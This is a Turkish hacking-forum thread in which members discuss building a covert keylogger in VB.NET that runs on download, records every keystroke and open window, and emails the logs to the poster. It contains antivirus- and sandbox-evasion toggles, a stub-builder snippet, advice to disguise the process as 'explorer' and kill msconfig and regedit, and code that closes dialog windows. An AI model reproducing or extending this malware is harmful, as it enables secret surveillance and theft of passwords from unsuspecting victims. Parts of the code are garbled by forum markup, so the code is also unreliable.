vb ile şu tarz keyloggeri yapabilirmiyiz?

15 Tem 2012
82
0
Program gibi ama program diğil indirildiği anda aktifleşen ve basılan her tuştan yapılan her işleme kadar .log tutup bnm e-mailime atabilecek bi keylogger yapabilirmiyiz? yapılırmı VB2010la veya C++ ile yapılırsa nasıl yapabilirim bana ÖM veya PM veya direk buraya yazarmısınız?

CheckBox 1 = Karakter Göster Name :CheckBox1
CheckBox 2 = Send Box Name :chkSandbox
CheckBox 3 = Wireshark Name:chkwireshark
CheckBox 4 = KeysCrambler Name: chkkeyscrambler
CheckBox 5 = Kaspersky Name: chkkaspersky
CheckBox 6 = Bit Defender Name: chkbitdefender
CheckBox 7 = Zone Alarm Name :chkZonealarm
CheckBox 8 = Anibus Name: chkAntiAnubis
CheckBox 9 = Norman Name: chkNorman
CheckBox 10 =Eset Nod32 Name: chkNod
bunları ve bunları
If chkSandbox.Checked = True Then Sandboxie() End If If chkkeyscrambler.Checked = True Then AntiKeyscrambler() End If If chkwireshark.Checked = True Then AntiWireshark() End If If chkkaspersky.Checked = True Then AntiKaspersky() End If If chkbitdefender.Checked = True Then AntiBitDefender() End If If chkZonealarm.Checked = True Then AntiZoneAlarm() End If If chkAntiAnubis.Checked = True Then AntiAnubis() End If If chkNorman.Checked = True Then AntiNorman() End If If chkNod.Checked = True Then AntiNOD32() End If
yazsam görünmez olurmu antivirus açısından?

anladığım kadarıyla bununla başlangıçta açılmasını sağlıyoruz
FileOpen(1, Application.StartupPath & "\Stub.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default) stub = Space(LOF(1)) FileGet(1, stub) FileClose(1) If File.Exists(str) Then My.Computer.FileSystem.DeleteFile(str) End If FileOpen(1, Application.StartupPath & "\" & str, OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default) FilePut(1, stub & FileSplit & text1 & FileSplit & text2) FileClose(1) Catch End Try End Sub
KODLAR ByImpera abimizden alıntıdır :)

Son düzenleme:

N S

Uzman üye
19 Haz 2013
1,139
7
208
kardeşim çok basit bir şey sen vb.net te kodlamaya başla ben sana kodları yazarım mesela görünmez olması için
Kod:
me.hide
ekle form1.name boş olsun veya "explorer" olsun timer ile sürekli me .hide komutu gir çakılmamasını istiyosan msconfig ve regediti öldür görev yöneticisine dokunma zaten görev yöneticisinde belli olmaz kodlama kısmında her aşamada yardı mederim imzamdaki programımda hemen hemen dediğin her kodu kullanmıştım

N S

Uzman üye
19 Haz 2013
1,139
7
208
bu arada klavye hangi şeyde kullanıydıysa derken neyi kast ettin anlamadım hangi pencerede kullanıldıysamı diyosun ? eğer öyleyse ekrandaki sekmeyi alman lazım ve şu şekilde yollanıcak kutuya yazdırmalısın yolla.text = açıkpencere.text , loglar.text , "varsa ekliyceğin yazı" .... şeklinde olmalıdır

15 Tem 2012
82
0
bu arada klavye hangi şeyde kullanıydıysa derken neyi kast ettin anlamadım hangi pencerede kullanıldıysamı diyosun ? eğer öyleyse ekrandaki sekmeyi alman lazım ve şu şekilde yollanıcak kutuya yazdırmalısın yolla.text = açıkpencere.text , loglar.text , "varsa ekliyceğin yazı" .... şeklinde olmalıdır

Kastetmek istediğim şey Açtığı pencereler örneğin
Browser - Windows Gezgini - bazı programlar - TaskManager vbvb....

kardeşim çok basit bir şey sen vb.net te kodlamaya başla ben sana kodları yazarım mesela görünmez olması için
Kod:
me.hide
ekle form1.name boş olsun veya "explorer" olsun timer ile sürekli me .hide komutu gir çakılmamasını istiyosan msconfig ve regediti öldür görev yöneticisine dokunma zaten görev yöneticisinde belli olmaz kodlama kısmında her aşamada yardı mederim imzamdaki programımda hemen hemen dediğin her kodu kullanmıştım

dediğin kodlar abi
Kod:
kill.reg
Kod:
Public Class Form1     Declare Function FindWindow Lib "user32" Alias "FindWindowA" ( _         ByVal l[URL="http://forum.donanimhaber.com/m_35609682/tm.htm#"][COLOR=darkred][U][B]pc[/B][/U][/COLOR][/URL]lassName As String, _         ByVal lpWindowName As String) As Int32      Declare Function SendMessage Lib "USER32" Alias "SendMessageA" ( _         ByVal hWnd As Int32, ByVal Msg As Int32, _         ByVal wParam As Int32, ByVal lParam As Int32) As Int32      Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick         Dim hwnd As Int32         hwnd = FindWindow("#32770", vbNullString)         SendMessage(hwnd, &H10, 0, 0)     End Sub End Class
mı?

Son düzenleme:

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.